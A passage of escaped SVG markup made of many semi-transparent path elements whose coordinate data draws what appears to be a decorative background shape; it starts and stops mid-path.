d=\"M377.36,57.38l3.48,3.7c2.16,0,4.31,0,6.46.1,2.56.18,5,1.74,7.54,2.67h.23q2-1.53,4-3.08a4.77,4.77,0,0,1-1.22,3.11c2.16-.47,4.32-.93,6.46-1.45a5.59,5.59,0,0,0,1.37-.82c-1.83-.71-3.62-1.86-5.51-2.06C392.6,58.76,385,58,377.36,57.38Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M368.88,56.73c-5.39-.38-10.86.29-16.23-.24-3.07-.31-5.38-.62-6.24,3-8.56-4.77-9.34-4.7-13.17,1.16,4.62-3.58,8.55-2.1,12.23,1.59.35.35,1,.36,1.58.52a20.12,20.12,0,0,0,3.44-1.34c3.29-2,6.73-3.32,10.6-2.59s7.48,1.71,11.22,2.57c2.84-.06,5.69-.22,8.53-.29l-3.48-3.7Q373.13,57,368.88,56.73Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M615.28,43.58a6.49,6.49,0,0,1-3.64.67c-2.37-.09-4.73-.22-7.1-.34-2,1.84-4.12,2.37-5.53,1.37l-1.27-.4c-3.89,2.68-8.45,3.06-11,.9L580,49.12l6.27,2.67c3.06-1.3,6.64-2.9,10.31-4.27.66-.25,1.68.48,2.54.77l1.28,0c2.18-2.06,4.28-1.29,6.42.13a4.86,4.86,0,0,0,2.56,1.08c3.71-.3,7.4-.81,11.1-1.31.21,0,.35-.54.52-.82-.26-.29-.53-.57-.79-.85Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M507.12,48c-.67.39-1.39,1.18-2,1.11-3.18-.35-6.35-.9-9.5-1.46-.31-.06-.52-.64-.78-1h-1.36l-6.75-.09H484l-10.48,2.29,0,1.24c5.62.81,11.31,2.46,16.85,2.09,3-.2,5.47-.82,8,1.06.6-3.51,1.47-3.82,4.77-3.15,2.15.43,4.49-.12,6.75-.24L508.44,48Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M850.88,16.19l5.58,2.33q15.19,3.06,30.4,6.12a22,22,0,0,1,2.23.68l2.07.77,5.43,3.21a17.66,17.66,0,0,1,4.35-.07,48.5,48.5,0,0,1,5.84,2.1l1.39-1.16c-3.15-1-6.25-2.3-9.46-3.05C882.78,23.41,866.82,19.82,850.88,16.19Z\" transform=\"translate(0 0)\"\n opacity=\"0.3\"></path>\n <path d=\"M576.37,50.06c-3.79.19-7.58.34-11.36.5l-1.29.43c-.05.49-.11,1-.16,1.47l.86.35,1.25-.23h.72l2.67.39a48.3,48.3,0,0,0,5.4-1.12,31.65,31.65,0,0,0,4.27-2.07l-2.08-.28C576.55,49.69,576.47,50.06,576.37,50.06Z\" transform=\"translate(0 0)\"\n opacity=\"0.3\"></path>\n <path d=\"M1059.41,43.77l-.77.61c-.24,1.13-.47,2.26-.71,3.39a18.41,18.41,0,0,1,2.82-2.05c.93-.45,2.43-1.08,3-.67,2.79,1.93,4.23.19,5.75-1.68a22.42,22.42,0,0,0-4.62-.68A37.77,37.77,0,0,0,1059.41,43.77Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M486.42,71.5c-3.79-.28-7.57-.59-11.36-.88l.77,1.08,3.3.13,11,1.19.4-1-.42-.41C488.86,71.59,487.64,71.58,486.42,71.5Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M527.5,50l-2.07.62,2.17,4.4L531,51.23c-.47-.39-.94-.78-1.4-1.18Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M614.07,8.49h-2l0,1.26,2.81.44C614.57,9.62,614.32,9.05,614.07,8.49Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1321.16,59.25l-.73.86Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1320.43,60.11l-.65.75Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1325.18,54.36c-1.27,1.52-2.76,3.37-4,4.89C1322.42,57.73,1323.91,55.88,1325.18,54.36Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1326.56,52.74c-.21.23-.42.48-.65.75C1326.14,53.22,1326.35,53,1326.56,52.74Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1327.11,52.14c-.17.17-.35.37-.55.6C1326.76,52.51,1326.94,52.31,1327.11,52.14Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1325.91,53.49l-.73.87Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1319.78,60.86l-.55.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M490.08,71.64l.42.41.95-.4c-.2-.67-.4-1.34-.59-2Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1086,41.78l-4.89-.68C1082.87,44.39,1083.61,44.49,1086,41.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1076.57,42.78l.45-1.1-1.31.45Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M565.79,29.66c.06-1.93-.63-4.54,2.58-4.94-1.36-3.09-2.72-.45-3.76.19s-1.65,1.89-2.45,2.88c.21-2.7-.49-6.21,3.19-6.42,5.16-.29,9.71-4.39,15.25-2.3.42.15,1.4-1.2,2.12-1.86-3.88-.15-7.73-1.19-11.6.57-2.71,1.23-6,1.38-8.43,3-1.57,1-2.22,3.68-2.88,5.74-.33,1.07.65,2.59.25,3.58A4.58,4.58,0,0,1,557.24,32c-.34.1-1.7-1.43-1.62-2.1a49.65,49.65,0,0,1,1.49-6.3A3.94,3.94,0,0,0,554.27,25c-.57.65-.81,1.6-1.41,2.19-2.5,2.45-2.2,7.69,1.09,8.56,2.94.79,6.48.12,9.56-.67C565.92,34.5,565.73,31.88,565.79,29.66Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M590,17.37c2.15,1.32,4.17.62,5.05-2.05-3-.28-6-.64-9-.8-1.78-.1-3.49.23-3.33,2.69C585.19,16.1,587.47,15.79,590,17.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M523.5,50.6l-6.22-.66C519.18,51.84,521.13,53.28,523.5,50.6Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M544.57,52.59l4.79-.53-6.14-.22Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M539.19,51.31H535Q537.09,54.13,539.19,51.31Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M674.64,5.51c3.24,2.44,6.72,1.7,10.21.74C681.62,3.7,678.1,5,674.64,5.51Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M621.45,9.64l-4,.6C619,11.45,620.43,12,621.45,9.64Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M557.51,52l3.44.5C560,51.14,558.9,50.51,557.51,52Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M678,35.46l-1.27,0c-2,.15-4.63-2.1-5.91,1.06-.88,2.19-.79,4.75,1.62,5.94,1.26.62,3.1,0,4.67,0C676.91,40.05,681.62,38.29,678,35.46Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M642,34.88l-1.44,2.06,2.08,3.75c-5.91.72-7,.08-6.56-3.72q.84-2.46,1.7-4.92L642,33.53c0-1,.27-2.25-.21-3a42.76,42.76,0,0,0-3.9-4.46c-5.63,3.6-4.11,9.68-5.71,14.76,3.08.93,5.82,1.68,8.51,2.58,1.68.55,2.88.21,2.71-1.65A63.89,63.89,0,0,0,642,34.88Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M654.52,37.15c-3-1-4.73.23-5.47,3.53a46,46,0,0,0,5.11,3.74,2.69,2.69,0,0,0,2.54-.71C658,41.13,656.79,37.88,654.52,37.15Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M380.12,72.88h1.16l2.19-5.26-6.27.06Q378.67,70.29,380.12,72.88Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M395.07,63.86l-.15.12c1.42.52,2.34.41,3-.09l-.49.1Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M399.1,60.78q-2,1.55-4,3.08l2.32.13.49-.1A4.77,4.77,0,0,0,399.1,60.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M399.1,60.78q-2,1.55-4,3.08l2.32.13.49-.1A4.77,4.77,0,0,0,399.1,60.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1664.81,72.6c-3.76.14-6.25-1-5.79-5.51-8.24.44-12.2-4.51-14.84-10.85l-5-.11,1.38-4.74L1637.29,50l-1.19-.25-2.21,3.28c-3.28,0-6.71-.25-10.11,0-2.36.17-3.93-.55-5-2.57-2.3.18-4.39.65-4.6,3.8-3.45-1.88-5.94.25-8.64,1.62-2.88,1.45-5.82,2.79-8.73,4.18,0,3.7-3.85,4.65-5.47,7.21-.19.3-2.22-.56-4.11-1.08a5,5,0,0,1-1.9,1.28c-1.07.3-2.75.47-3.42-.14-2.52-2.26-4.74-4.86-7.28-7.57L1569.3,64c.26.79.58,1.71,1,3-4.84,0-8.94-.8-11.86-4.8-1-1.44-4.38-.65-5.42,1.28-.62,1.15-1,2.4-1.61,3.69-3.49-1.8-6.64-2.52-10.12.2l-1-6.9-1.73,1a28.62,28.62,0,0,1-.39,3.35,3,3,0,0,1-5,1.65c-3.85-3.61-4.45-3.68-8.87-1a9.11,9.11,0,0,1-1.13.48c-.07-1.6.41-3.62-.34-4.33-1-.89-2.92-.69-4.44-1a11.3,11.3,0,0,0-3-.6,4.21,4.21,0,0,0-2.82,1.14c-3,4.1-5.26,4.64-9.73,2.09a38.14,38.14,0,0,0-3.73-1.53l3.55,4.65c-3.76-.14-5.79-1.6-7.27-3.65-1.3-1.8-2.32-2.25-4.45-1.1-3.31,1.78-6.88,3.07-10.48,4.63l-1.82-2.69c-1.9.35-2.84,4-5.56,1.39.28-.32.56-.59.8-.9.67-.86,1.71-1.67,1.85-2.62.09-.57-1.27-1.93-1.92-1.9a3.45,3.45,0,0,0-2.45,1.77c-.94,2.21-2.11,3.13-4.3,1.57l-3.38,4-2.57-3.17L1458,65.6l-.72-.38c.4-1.32.81-2.64,1.36-4.43a8.88,8.88,0,0,0-1.73,1.1c-2.58,2.82-2.2,2.48-4.89-.34-1.6-1.68-4.57-2.06-7.18-3.14l-2.06,6-6.73-4.13-1.95,4.61c-3.35-1.89-1.19-4.44-1.42-6.94l-3.06,1.52c-2.06-4.1-5.47-6.59-8.27-6l0,0c0,1.45,0,2.91-.17,4.35s-.11,3.36-.89,3.8a24.34,24.34,0,0,1-7.85,3c-.84.14-2.57-2-3-3.39-.92-2.73-2.66-2.19-3.72-.87-1.66,2.07-3,3.61-5.78,1.86-.4-.25-1.47.59-3,1.26.28-3.12.52-5.88.78-8.8-3.9.23-4.2,4.76-6.84,7.06l2.77.25c-.3,2.21-.58,4.37-.9,6.79-4.36,1.6-8.33,1-12-3.82-.45,2.68-.71,4.27-1,5.86l-1.23,0-.09-5.57c-4.85-.22-5.88-1.3-7.45-7.5a10.27,10.27,0,0,0-1.53-2.56c-.86.79-2.06,1.42-2.52,2.39a.8.8,0,0,0-.07.2,17.91,17.91,0,0,0,3.35.38,31.12,31.12,0,0,1-2.69,4.41,7.22,7.22,0,0,0-.73-.83,7,7,0,0,0,2.45,3.09,4.87,4.87,0,0,1,1.22,2c.26.57.23,1.69.54,1.77,4.24,1.08,3.72,5.67,6.08,8.1a3.78,3.78,0,0,1,.28,1.17c4.9,1.81,11.61,0,7.49,7.22.93,0,1.86,1.46,2.78,1.5a1.93,1.93,0,0,0,1.31-1.52c0-.09.18-.23.25-.21,4.15.85,5.2-1.72,6-5,.1-.38,2.77-.11,5.19-.16.64-1.69,1.6-4.22,2.34-6.2,2.16-.59,4-1,5.69-1.6,2.08-.75,3.19-.5,3.27,2a2.8,2.8,0,0,0,4.42,2.37l2-1.18,1.72-1.08c.23.8.41,1.44.59,2.08l4.49-1.27c.76-3.18,4.75-6.31,7.59-5.52,1,.27,1.55,1.92,2.32,3,2.69-.45,5.41-.82,8.09-1.36,4.48-.92,9.45,2.06,13.59-1.73.22-.21.86.05,1.31.08a27.18,27.18,0,0,0,5,.23c2.43-.32,4.79-1.43,7.21-1.5,7.3-.21,14.6-.08,21.91-.07,3.35.46,6.71.91,10.06,1.38l4-.22c1.29-.37,2.7-1.28,3.85-1,3.3.72,6.47,2.06,9.62-.47a3.24,3.24,0,0,1,2.29-.3c5.84.94,11.67,1.9,17.49,3a11.89,11.89,0,0,1,2.91,1.47l1.34-.12a7.76,7.76,0,0,1,2.34-1c3.41-.24,6.83-.33,10.25-.46a.46.46,0,0,1,.33.07c5.27,4.14,11.33.27,17,2l3,5.61c2.23-3.22-.92-7.65,3.41-8.37,2.25.11,4.63-.19,6.71.47,1.82.57,4.56.94,4.14,4.18a15.57,15.57,0,0,0,.45,3.63l3.83-.53c-.31-1-1-2.12-.76-2.82.37-1,2-2.38,2.25-2.23,2.63,1.6,3-.55,4.13-3,3.4,2,6.75,3.57,9.72,5.7,2,1.42,3.35.52,5-.2,2-3.33,3.3-3.71,6.5-2.07a36,36,0,0,0,3.67,1.4c1.91-4.84,8.35-7.47,13.09-5.71a10.29,10.29,0,0,0,3.93.58c2.66-.1,4.6.16,5.78,3.26s3.55,1.73,5.58-.06c5.34,4.46,11.13,7.37,18.27,5.13-.56-1.46-1.13-2.92-1.69-4.37C1668.51,72.76,1666.65,72.53,1664.81,72.6Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1367.53,62.55a31.12,31.12,0,0,0,2.69-4.41,17.91,17.91,0,0,1-3.35-.38,5.14,5.14,0,0,0-.07,4A7.22,7.22,0,0,1,1367.53,62.55Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1367.53,62.55a31.12,31.12,0,0,0,2.69-4.41,17.91,17.91,0,0,1-3.35-.38,5.14,5.14,0,0,0-.07,4A7.22,7.22,0,0,1,1367.53,62.55Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1350.53,53.61a12.91,12.91,0,0,1,5.93.69c.72.26,2-.44,2.76-1a12.13,12.13,0,0,0,2-2.32c.51,2.08,1,3.92,1.4,5.67l1.88.53a13.59,13.59,0,0,0,.91-3.92,7.69,7.69,0,0,0-1.12-4.78c-3.86-5.23-3.61-8.25,1.59-12.2l-1-2.41-3.27,1.17c-1.39,3.27-4.58,2.18-7,2.88l-4.15.64-2.78,5.82c.14.88.27,1.75.41,2.62,1.78,1.32.75,2.12-.54,2.86-1.6.92-3.2,1.82-4.8,2.73l.07.06,1.06,0A24.11,24.11,0,0,1,1350.53,53.61Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1363.39,59.73l.08-.16-.13-.06Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1362.64,56.67c.24,1,.47,1.9.7,2.84l.13.06q.6-1.2,1-2.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1362.64,56.67c.24,1,.47,1.9.7,2.84l.13.06q.6-1.2,1-2.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1350.53,53.61a24.11,24.11,0,0,0-6.62-1l-1.06,0,2.37,2.32A20.91,20.91,0,0,1,1350.53,53.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1350.53,53.61a24.11,24.11,0,0,0-6.62-1l-1.06,0,2.37,2.32A20.91,20.91,0,0,1,1350.53,53.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1904.67,105c-4.63-4.2-8.58-9.71-16.11-8.24a1.27,1.27,0,0,1-.94-.32c-2.87-2.78-5.66-2-8.11.22-2.16-1.59-3.91-3.38-6-4.25-1.51-.62-4-.66-5.22.23-2.55,1.92-5.26,1.35-7.94,1.61-.49,0-1.34-.59-1.46-.44-2.78,3.3-4.85.39-7.25-.82l-.95,1.13-8-.57,1.62,1.88,1.31-.09,3.89.68a27.36,27.36,0,0,0,5.26.81c3.42-.11,6.85-.51,10.26-.92a6.53,6.53,0,0,0,2.39-1.06c2.51-1.5,4.93-.16,5.11,2.8a7.37,7.37,0,0,0,.4,1.8c3.42-.78,6.66-2.57,9.08-1.79,2.83.9,5.25.33,7.87.48,1.77.1,4.3.69,5.07,1.94C1897.6,104.32,1899.41,105.54,1904.67,105Zm-54-10.88Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1779.25,94.49c-.56-.77-1.56-2.16-2.4-3.34L1772,94.69l-7.26-7.64c-.54,1.71-.92,2.92-1.59,5l-5-5.65-1,3.54c-2.11-1.68-4-3.19-5.9-4.71l-.63.64c.37,1.73.75,3.47,1.12,5.2a6.41,6.41,0,0,1,1.94-.09c4.59,1.21,9.17,2.43,13.71,3.79a12.94,12.94,0,0,1,2.87,1.77c3-1.41,6-3.41,9,0l1.22-.18c1.74-.63,3.55-1.15,5.23-1.93,2.21-1,4.32-2.27,6.47-3.43-2.52.6-5,1.14-7.54,1.8C1783,93.24,1781.29,93.84,1779.25,94.49Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1712.48,80.52c-2.44,2.26-4.44,1-6.69.37-1.71-.45-3.42-.87-5.13-1.31l.38.94c-1.25.82-2.67,2.51-3.7,2.3a26.81,26.81,0,0,1-7-3A28.61,28.61,0,0,0,1675,76.56l-1.76.73a2.52,2.52,0,0,1,.08.55c2.37.33,4.74.68,7.12,1,.54.07,1.18-.17,1.65,0,2.47,1.08,4.91,2.26,7.36,3.4L1692,82c1.18.3,2.57.3,3.5,1,2.19,1.5,4.06,2,6.39.17,1-.73,2.92-1.24,3.82-.74,4.17,2.29,8-.62,12-.33C1716.35,80.15,1714.05,79.07,1712.48,80.52Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1899.35,115.9l0,0c.09.56.18,1.13.28,1.7,2.05-.79,4.27-.89,7.51.73,0-1.07,0-2,.05-2.8A10.94,10.94,0,0,0,1899.35,115.9Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1836.36,93.51a2.14,2.14,0,0,1-2.07.29c-3-2.07-7.49-2.27-8.52-6.81-.06-.27-.72-.4-1-.53a13.68,13.68,0,0,1-2.71,2.53c-2.28,1.15-4.69,2-7.06,3l4.21.73,1.28-.88,2.63-.37c1.11-.09,2.37-.56,3.3-.2,3,1.16,6,2.63,8.94,4l3.23-1,2.65-1.15C1839.51,91.87,1837.9,91.28,1836.36,93.51Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1727.53,82.77c-2,1.34-7.35,1.1-9.59-.42-.6,3.09,1.11,3.46,3.55,3.09,6-.94,11.13.12,13.86,6.49.34.8,1.84,1.12,2.81,1.66-1.94-3.06-4-6.07-5.79-9.2C1731.16,82.33,1729.86,81.22,1727.53,82.77Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1795.58,90.34l4.15,5.71,3.54.31,2-.34-.12-1.32A15.34,15.34,0,0,1,1795.58,90.34Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1743.5,89.25c-1,.45-1.29,2.49-1.89,3.84l3-3,4,3.33,2.54-1.61c-1.19-.39-2.39-.76-3.57-1.19C1746.11,90.13,1744.42,88.82,1743.5,89.25Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1807.27,89.45c-.13,1.85-.21,3-.29,4.23l2.87,1,3.18-2C1810.42,94,1809.32,90.83,1807.27,89.45Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1813,92.69a5.39,5.39,0,0,0,.68-.43Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1741.6,93.1l-2.77.67C1740.15,95.2,1741.08,95,1741.6,93.1Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1793.51,90.08l1.31-.27-1.08-1.71C1793.62,89.11,1793.56,89.6,1793.51,90.08Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1380.52,59.15c2.15,1.79,3.21.94,5.41-4.5a45.93,45.93,0,0,0-3.11-5.31c-.66-.85-2-1.21-3-1.79-.22,1-.94,2.3-.57,3,1.18,2.42.69,4.27-1.13,6.07l-3.17-.95-1.07.76,2.7,4.92Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1362.6,59.18c-1.5-.63-3.34-.38-5-.73-4.94-1.05-9.84-3-14.78-3.07-4.45-.06-8.28-1.57-12.35-2.59-.47-.11-.85-.6-1.27-.91l-1.29-.41c-.71-.12-8.9,11-9.52,10.67-16.28-9.53-32-9.06-39.59,8.59-1.77,4.08-5.83,4.23-10.7,3,.88,2.86,3.27,1.83,5.35,1.7,4.06-.25,8.11-.74,12.16-.66,7,.15,13.29-5.28,20.49-5.78,4.87-.34,7.63-5.18,12.53-4.58,2.64.33,12.67-10,15.23-9.32,4.88,1.38,9.82,2.69,14.55,4.5A46.36,46.36,0,0,1,1358.72,65a35,35,0,0,1,3.57,3,27.72,27.72,0,0,0,5.24-5.44A11.18,11.18,0,0,0,1362.6,59.18Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1265.91,71.75a4.27,4.27,0,0,1-2.24.72c1.53.5,3,1,4.45,1.31a6,6,0,0,1-.16-.67C1267.84,72.52,1266.21,71.56,1265.91,71.75Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1228.49,66a13.19,13.19,0,0,0-4-.24c-2.93,0-5.88.15-8.8-.06-7-.51-13.91-1.31-20.88-1.76-6.08-.39-12.18-.55-18.27-.68-7.89-.18-15.79-.24-23.68-.32-4,0-8.08-.08-12.12,0-2.11,0-4.22.37-6.33.54a5.91,5.91,0,0,1-2.61,0c-3.66-1.62-7-1-10.37.87-.75,1.58-1.48,1.55-2.2,0l-1.22,0-2.47,2.29a30.58,30.58,0,0,1-3-4.62c-.44-1-.08-2.38-.81-4l-2.85,3c-.14-.28-.53-.73-.43-1,2-4.41-.9-6.44-4-8.29a3.72,3.72,0,0,0-2.5-.41c-6.11,1.53-6.11,1.57-9.09-4.29a30,30,0,0,1-1.2-2.79c-1.64-4.42-1.64-4.43-5.69-2.55-2.35,2.71-3.09,2.61-4.89-.69l-4,.59-.45,1.1-.86-.65-6.19,1.23c-1.52,1.88-3,3.62-5.75,1.69-.59-.41-2.09.22-3,.67a19,19,0,0,0-2.82,2l-2,.7c-.44,3.32-3.51,2.53-5.46,3.49l5,4.48a74.68,74.68,0,0,0,4.52-7c2-3.94,5.19-1.66,7.81-2.26l.54,1-6,4.6c3.36.48,5.89,1.22,8.44-.93,1-.87,2.82-.88,4.28-1.19,1-.22,2.4.09,3.1-.48,2.25-1.84,4.36-.89,5.7.66.68.79-.24,3-.5,5l9.51,3.68c-.43,1.15-.94,2.51-1.44,3.87,3,0,5.92-.2,8.84.05,4.21.35,8.52,0,12.2,3.2,2,1.71,4.78,2.65,7.38,3.28,1.4.33,3.81-.24,4.58-1.28,1.7-2.31,4.35-3.72,6.47-1.89s3.4,1,5.06-.56,3.53-2,5.67,0c1.06,1,3,1.06,4.62,1.22,2,.2,4,0,6.53,0,2.43-2.7,6-.62,9.34-.88,1.77-.13,3.65.36,5.32-.07,3.63-.91,7.06-1.14,10.22,1.17,3.44,2.51,5.13,2.45,8.17-.26a3.89,3.89,0,0,1,2.32-1c3.09,0,6.18.25,9.26.49,5.39.41,10.85,1.66,16.14,1.17,10-.92,18.81,3.75,28.26,5.23a40,40,0,0,0,6,0c0-.36,0-.72,0-1.08a4.5,4.5,0,0,0,6.73-.29,3.33,3.33,0,0,1,4-1.08c1.67.53,3.29,1.64,5.08,1.59-5.4-1.8-11.22-4.2-15.81-4.32C1241.28,68,1234.8,68.2,1228.49,66ZM1092.16,55.67a.55.55,0,0,1-.52-.22c-.06-.14.13-.37.21-.56l.57.24C1092.34,55.32,1092.3,55.62,1092.16,55.67Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M539.19,51.31q-2.1,2.82-4.2,0l-4-.08-3.36,3.83-2.17-4.4-1.93-.06c-2.37,2.68-4.32,1.24-6.22-.66l-7.43-.1c-2.26.12-4.6.67-6.75.24-3.3-.67-4.17-.36-4.77,3.15.57,1.38,1.14,2.77,1.91,4.62l-5.83.32L493.47,60q-1.26,3.79-2.53,7.59c0,.68-.06,1.35-.08,2,.19.68.39,1.35.59,2l2-1.35c0-4-.33-8.25,4.45-9.92,2.53-.89,3.32-2.36,3.13-4.81a33.14,33.14,0,0,1,.16-3.84c1.47.38,2.59.64,3.69,1,1.27.38,2.53,1.23,3.77,1.19,6.47-.24,11.1,2.17,12.94,8.66.8,2.81,2.64,4,5.32,4.32-.43-2.48-2.15-5.21,1.37-6.9-.4-3,2.15-5.88,5.72-6a10.91,10.91,0,0,1,5.51,1c3.26,1.92,4.15,0,5.06-2.42l-1.35-.75Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M407.63,65c.19-.78-1.11-1.93-1.73-2.91a19.22,19.22,0,0,1,3.79,2.16,10.51,10.51,0,0,0,2.88,2,15.17,15.17,0,0,1,3.2-.36h.3a6.77,6.77,0,0,0,1.27-1.29c-.56-.2-1.17-.24-1.49-.56s-.91-.87-1.33-1.33l-8.81-1.17a5.59,5.59,0,0,1-1.37.82c-.65.16-1.31.3-2,.45a4.38,4.38,0,0,0-.43,1.49,3.89,3.89,0,0,1,2.34,1.85h0a7.52,7.52,0,0,0,3.54.79A2.26,2.26,0,0,1,407.63,65Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M454.88,67.81c-7.81-1.91-16.06.63-23.59-2.89-.28-.13-.68,0-1,0l-9.62-1.27a10.5,10.5,0,0,0,1.83,2.4,32.85,32.85,0,0,1,11.19,1.73c3.6,1.33,7.7,1.37,11.59,1.87,4.35.56,8.78-.92,13.12,1.78,2.21,1.37,5.71.6,8.61,1a45.91,45.91,0,0,1,4.89,1.08c1.74.39,3.46.79,3.94-1.71l-.77-1.08C468.32,69.73,461.44,69.41,454.88,67.81Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M397.39,64l.22.08a1.81,1.81,0,0,0,.27-.18Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M596.54,47.52c-3.67,1.37-7.25,3-10.31,4.27L580,49.12l-1.23.66a31.65,31.65,0,0,1-4.27,2.07,48.3,48.3,0,0,1-5.4,1.12c0,.32,0,.65,0,1,3.79-.66,7.76-1.87,9.71,4.77,1.76-8,5.42-2.43,8.15-2.87.34-.84.64-1.62,1-2.44l2.53,1-.27-1.12,4.74-2.09,2.78-2,1.33,0c0-.3,0-.59,0-.89C598.22,48,597.2,47.27,596.54,47.52Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M909.5,30.4l-1.33-.23-1.39,1.16,2.89.56C909.61,31.39,909.55,30.9,909.5,30.4Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M689.59,6.87l-4.74-.62c-3.49,1-7,1.7-10.21-.74-6.36.51-12.8.34-18.93,2.74a6,6,0,0,1-4.36-.58c-3.05-1.58-5.77-1.31-7.28,1.54-1.29,2.41-2.39,2.22-4,.46-2.08-2.26-4.24-2.5-6.83-.48-.89.69-2.6.4-3.94.43-2.61.05-5.23,0-7.84,0-1,2.33-2.46,1.81-4,.6l-2.63-.05L612,9.75l-1.3,0L607.9,11l-12.81,4.28c-.88,2.67-2.9,3.37-5.05,2.05-2.57-1.58-4.85-1.27-7.31-.16h0c-.72.66-1.7,2-2.12,1.86-5.54-2.09-10.09,2-15.25,2.3-3.68.21-3,3.72-3.19,6.42.8-1,1.43-2.26,2.45-2.88s2.4-3.28,3.76-.19l2,2.13,13.75-3.14c.89.15,2.16,2.24,3,2.08,2.76-.57,3.08.66,3.23,2.79,0,.66.88,1.26,1.35,1.89.36-1.6-.25-3,0-4.16a11,11,0,0,1,2.19-4c.2-.27,1.37.11,2.07.31,1.35.4,2.7,1.3,4,1.23,4.93-.28,7.66.7,8.81,6.51.47,2.41,1.78,3.41,4.28,3.14a28,28,0,0,1,4.47.2c3.43-.46,6.8-.75,9.24,2.5,1.42,1.89.87,5-1.31,5.25-2.74.29-3.43,1.48-3.32,3.92,0,.63-.76,1.29-1.17,1.94-.17.28-.31.8-.52.82-3.7.5-7.39,1-11.1,1.31a4.79,4.79,0,0,1-2.56-1.08c-2.14-1.42-4.24-2.19-6.42-.13,3.2,2.24,6.41,4.46,9.6,6.71.71.5,1.35,1.11,2,1.67l6.16-4.52,3.65,4.7,3.12-2.22,4.38-5.54,1.5.44c-.09,2-.23,3.94-.24,5.9,0,.73.15,1.89.58,2.07a2.66,2.66,0,0,0,2.33-.28c1.74-1.48,3.27-1.69,5.13-.2a13.22,13.22,0,0,0,3.1,1.4,29.4,29.4,0,0,0,.88-3.44,17.25,17.25,0,0,0-.21-3.11h-7c-.91-3.94,3.58-3.21,5.15-4.57,2.31-2,4.88-.07,6.74,2,5-5,